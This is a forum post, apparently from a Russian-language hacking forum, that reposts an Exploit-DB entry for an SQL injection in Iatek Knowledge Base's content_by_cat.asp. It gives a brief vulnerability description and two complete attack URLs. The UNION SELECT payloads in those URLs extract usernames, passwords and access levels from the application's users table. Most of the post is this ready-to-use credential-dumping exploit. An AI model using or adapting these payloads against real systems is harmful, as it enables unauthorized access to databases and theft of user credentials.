Exploit Iatek Knowledge Base - 'content_by_cat.asp' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
31463
Проверка EDB
  1. Пройдено
Автор
XCORPITX
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
N/A
Дата публикации
2008-03-20
Код:
source: https://www.securityfocus.com/bid/28376/info

Iatek Knowledge Base is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accesslevel,5,null,7,null,user_name+from+users

http://www.example.com/content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accesslevel,5,null,7,8,user_name+from+users
 
Источник
www.exploit-db.com

Похожие темы